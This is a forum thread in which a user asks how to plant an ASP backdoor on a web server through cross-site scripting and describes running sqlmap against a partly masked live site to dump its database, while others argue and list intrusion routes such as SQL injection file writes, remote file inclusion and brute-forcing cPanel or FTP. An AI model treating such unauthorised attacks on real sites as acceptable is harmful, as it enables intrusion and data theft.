This thread is for people with a sound mind and understanding of javascript, so if you cannot program in javascript, please don't come here and reply silly things, thank you.

It's cross site scripting am interested in. Now having used Google Chrome as something like a console via inspect element I have been able to edit pages, load images and do some crazy stuff, using Google as my compiler for javascript

Now, I want to do something about xss(cross site scripting) and load or would I say create a script upload it to a server, load it this way

<script src= "http://domextech.us/vivi.js"></script>

And it generates an asp / php file on the server so with the name infos.asp so that I can load it like this

Http://www.domextech.us/infos.asp

That is to say, I load the java script and refresh it and it file writes a new page to the server without me having to go thru rigours of fighting with the ftp server.

Kindly advise.

gimakon:
This thread is for people with a sound mind and understanding of javascript, so if you cannot program in javascript, please don't come here and reply silly things, thank you.

seriously? ok, let me state that the worst of the worst here may even be able to teach you the 101 which you obviously skipped.
sorry for being this blunt, you sound like an "illiterate" programming-wise

slightlyMad:


seriously? ok, let me state that the worst of the worst here may even be able to teach you the 101 which you obviously skipped.
sorry for being this blunt, you sound like an "illiterate" programming-wise

A super s*tupid post coming from you. I believe this isn't the answer I asked for. People like you are the reason I put that kind of statement up because you always want to give up stupid answers just like the one u gave now. How has this useless post u gave contributed to solving my problems? Imagine ah put the same question on Romania security forums and I have been given answers, it comes here and an idiotic post comes from u.. not surprised. Dunse!!!

gimakon:


A super s*tupid post coming from you. I believe this isn't the answer I asked for. People like you are the reason I put that kind of statement up because you always want to give up stupid answers just like the one u gave now. How has this useless post u gave contributed to solving my problems? Imagine ah put the same question on Romania security forums and I have been given answers, it comes here and an idiotic post comes from u.. not surprised. Dunse!!!

share the romania website forum link so we can be entertained

slightlyMad:


share the romania website forum link so we can be entertained

Mxm.

Seriously, your intro is really discouraging.

gimakon:


A super s*tupid post coming from you. I believe this isn't the answer I asked for. People like you are the reason I put that kind of statement up because you always want to give up stupid answers just like the one u gave now. How has this useless post u gave contributed to solving my problems? Imagine ah put the same question on Romania security forums and I have been given answers, it comes here and an idiotic post comes from u.. not surprised. Dunse!!!

FincoApps:
Seriously, your intro is really discouraging.

this guy is a living testimony to the fact that shepe and programming dont compile
imagine, he used google as his compiler for javascript
when he should have used yahoo

slightlyMad:


this guy is a living testimony to the fact that shepe and programming dont compile
imagine, he used google as his compiler for javascript
when he should have used yahoo

Lol. I said Google Chrome. Dunse. Didn't even read. I solved my problem by the way, so enough talk. You have to stop fooling yourself further. Programmer my foot. Na so u wan use pass job interview.

Calm down mehn

gimakon:


Lol. I said Google Chrome. Dunse. Didn't even read. I solved my problem by the way, so enough talk. You have to stop fooling yourself further. Programmer my foot. Na so u wan use pass job interview.

why should gimakon calm down, he wrote an interesting question and all the other person did was abuse him


@gimakon I still don't get the original question, you want to load a script in a page and push all the contents back to the same server of the domain hosting the same script ? Something like injecting a script and sending all the info to a server somewhere ?

pcguru1:
why should gimakon calm down, he wrote an interesting question and all the other person did was abuse him


@gimakon I still don't get the original question, you want to load a script in a page and push all the contents back to the same server of the domain hosting the same script ? Something like injecting a script and sending all the info to a server somewhere ?

It's about exploit and exploit making for security purposes. I was trying to use xss. You know, Cross site scripting.
Other than the normal <script>alert('XSS');</script>
I wanted to create in a .js script, and load into a server, vis inject element... and yes, it worked!

Now I wanted to again try something like this, use file write to create / file write an asp file to the server so I can do Sql injection from the other end, it failed. You know, create a file and write the sql injection contents to the new file and then do sql injection from there.
Like in c++, I do things like findResource, LoadResource, Sizeofresource, Lockresource, CreateFile, then later I use a function to inject or shellexecuteA () to shell execute the program, but this is javascript, totally different. Doesn't work for me

Now I fired up kali Linux, opened up my terminal and did ./sqlmap and then

./ sqlmap -u "http://www.xxxxxx.com/hadji/index.asp?pid=5

(I intentionally didn't give other commands here), and I exploited the db using GET parameters. Saw the db name, db tables, and other infos...

Resumed something new on POST Parameters, and burp proxy... Possibly you would have heard about this before @pcguru1, I believe you have idea about Kali Linux, gonna be needing a hand on something here
So you gonna be showing help?

gimakon:


It's about exploit and exploit making for security purposes. I was trying to use xss. You know, Cross site scripting.
Other than the normal <script>alert('XSS');</script>
I wanted to create in a .js script, and load into a server, vis inject element... and yes, it worked!

Now I wanted to again try something like this, use file write to create / file write an asp file to the server so I can do Sql injection from the other end, it failed. You know, create a file and write the sql injection contents to the new file and then do sql injection from there.
Like in c++, I do things like findResource, LoadResource, Sizeofresource, Lockresource, CreateFile, then later I use a function to inject or shellexecuteA () to shell execute the program, but this is javascript, totally different. Doesn't work for me

Now I fired up kali Linux, opened up my terminal and did ./sqlmap and then

./ sqlmap -u "http://www.xxxxxx.com/hadji/index.asp?pid=5

(I intentionally didn't give other commands here), and I exploited the db using GET parameters. Saw the db name, db tables, and other infos...

Resumed something new on POST Parameters, and burp proxy... Possibly you would have heard about this before @pcguru1, I believe you have idea about Kali Linux, gonna be needing a hand on something here
So you gonna be showing help?

To be honest I have little or no knowledge on network or security at that advanced level like you. But am familiar with a packet sniffer that reads http request however burp proxy o had to google it to get an idea. I know kali and read on some security books about it. But compared to you am not that knowledgeable about it. Also using javascript well not that would work as it would require a client browser to be effective unless you were sure the server was running node and you could execute a shell to run node against your js(node script) but am interested regardless. Will follow your thread and read up more to gain more insights

pcguru1:


To be honest I have little or no knowledge on network or security at that advanced level like you. But am familiar with a packet sniffer that reads http request however burp proxy o had to google it to get an idea. I know kali and read on some security books about it. But compared to you am not that knowledgeable about it. Also using javascript well not that would work as it would require a client browser to be effective unless you were sure the server was running node and you could execute a shell to run node against your js(node script) but am interested regardless. Will follow your thread and read up more to gain more insights

Huh, did you say node.js can help me do something like that? Like create a new asp file, like a backdoor and file write it to the Web server from the node js script file, so I can do those sql injections from the new asp generated?

gimakon:

It's about exploit and exploit making for security purposes. I was trying to use xss. You know, Cross site scripting.
Other than the normal <script>alert('XSS');</script>
I wanted to create in a .js script, and load into a server, vis inject element... and yes, it worked!
Now I wanted to again try something like this, use file write to create / file write an asp file to the server so I can do Sql injection from the other end, it failed. You know, create a file and write the sql injection contents to the new file and then do sql injection from there.
Like in c++, I do things like findResource, LoadResource, Sizeofresource, Lockresource, CreateFile, then later I use a function to inject or shellexecuteA () to shell execute the program, but this is javascript, totally different. Doesn't work for me
Now I fired up kali Linux, opened up my terminal and did ./sqlmap and then
./ sqlmap -u "http://www.xxxxxx.com/hadji/index.asp?pid=5
(I intentionally didn't give other commands here), and I exploited the db using GET parameters. Saw the db name, db tables, and other infos...
Resumed something new on POST Parameters, and burp proxy... Possibly you would have heard about this before @pcguru1, I believe you have idea about Kali Linux, gonna be needing a hand on something here
So you gonna be showing help?

pcguru1:


To be honest I have little or no knowledge on network or security at that advanced level like you. But am familiar with a packet sniffer that reads http request however burp proxy o had to google it to get an idea. I know kali and read on some security books about it. But compared to you am not that knowledgeable about it. Also using javascript well not that would work as it would require a client browser to be effective unless you were sure the server was running node and you could execute a shell to run node against your js(node script) but am interested regardless. Will follow your thread and read up more to gain more insights

@pcguru
I did not attack him rather he attacked himself with his introduction.
after reading his intro, i was expecting an impressive question only to be greeted with questions that displayed he is one of those script kiddies who know that you put this here, put that there but has absolutely no clue. they can even format their own computer without even knowing it.

2 ways you can attempt xss is by
1. taking advantage of an existing SQL injection vulnerability, you write the javascript to database or file on server using load into file
2. by taking advantage of the fact that the developer outputs inputs directly without converting the HTML special characters to their equivalent entities.

if you can upload a file to a server as you claim, you dont need sql injection anymore as in the bolded
if you can write a file to a server, you already owned it
sql injection, remote file inclusion, cpanel or ftp brute forcing are ways to upload files to server.

not javascript or chrome's inspect element

all those crap up there is a failed attempt to sound knowledgeable.
dont fall for it

slightlyMad:





@pcguru
I did not attack him rather he attacked himself with his introduction.
after reading his intro, i was expecting an impressive question only to be greeted with questions that displayed he is one of those script kiddies who know that you put this here, put that there but has absolutely no clue. they can even format their own computer without even knowing it.

2 ways you can attempt xss is by
1. taking advantage of an existing SQL injection vulnerability, you write the javascript to database or file on server using load into file
2. by taking advantage of the fact that the developer outputs inputs directly without converting the HTML special characters to their equivalent entities.

if you can upload a file to a server as you claim, you dont need sql injection anymore as in the bolded
if you can write a file to a server, you already owned it
sql injection, remote file inclusion, cpanel or ftp brute forcing are ways to upload files to server.

not javascript or chrome's inspect element

all those crap up there is a failed attempt to sound knowledgeable.
dont fall for it

Hmmm

Everything you said on here is true i admit. But the fact you do not read even makes me more angrier. I never said i accomplished it, I said i did the <script>alert('XSS');</script> part, that one worked.
Now I tried the other one , file writing to the server without having to go thru the ftp server , and NO that one didnt work.

then i tried using sqlmap which worked as well.

So why attack me? You need to do reading before YOU feel like a god programmer . Your problem seems to be you claim you know too much, Even Bill Gates ask questions mind you, so if i come here to sk the same questions i dont see what it is as a problem, like you haven't had problems that you ask before .

Sorry i was typing with a phone, honestly i find it hard to imagine a way you can hack a server via JS or even a NodeJS file.

if you can upload a file to a server as you claim, you dont need sql injection anymore as in the bolded
if you can write a file to a server, you already owned it

@slightlyNotMad does raise some valid points,once a file is uploaded to a server you don't need SQL Injection I know for a fact that some peeps can modify the exif part of an image and put some php codes in it, and upload that file to a server, however not sure about executing it because i assume Apache won't parse an image only php scripts, however i know in PHP you can read an image from string, so not sure if using an eval would execute it.

pcguru1:
Sorry i was typing with a phone, honestly i find it hard to imagine a way you can hack a server via JS or even a NodeJS file.

if you can upload a file to a server as you claim, you dont need sql injection anymore as in the bolded
if you can write a file to a server, you already owned it

@slightlyNotMad does raise some valid points,once a file is uploaded to a server you don't need SQL Injection I know for a fact that some peeps can modify the exif part of an image and put some php codes in it, and upload that file to a server, however not sure about executing it because i assume Apache won't parse an image only php scripts, however i know in PHP you can read an image from string, so not sure if using an eval would execute it.

Thanks. Figured out what to do already. Using Kali to solve all my problems now